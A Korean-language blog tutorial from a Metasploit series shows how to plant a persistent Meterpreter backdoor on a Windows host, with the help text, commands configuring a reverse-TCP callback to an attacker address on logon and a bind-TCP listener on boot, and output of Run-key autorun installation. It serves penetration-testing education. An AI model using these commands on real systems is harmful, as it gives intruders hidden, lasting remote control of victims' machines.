[MAD-METASPLOIT] 0x34 - Persistence Backdoor

Persistence backdoor

Meterpreter는 Persistence 를 이용하여 시스템에 백도어를 남겨 지속적으로 접근할 수 있는 통로를 만들 수 있습니다.

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

각각 옵션에 따라 부팅 시 , 로그온 시 등 설정이 가능합니다.

User 로그온 시 reverse connection 하도록 backdoor 생성

meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99642 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs
[+] Agent executed with PID 8068
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb

System이 부팅되자마자 22번 포트를 bind 시키는 형태의 backdoor 생성

meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc
[*] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22
[*] Persistent agent script is 99692 bytes long
[+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[*] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs
[+] Agent executed with PID 1592
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao

---

HAHWUL Security engineer, Gopher and H4cker!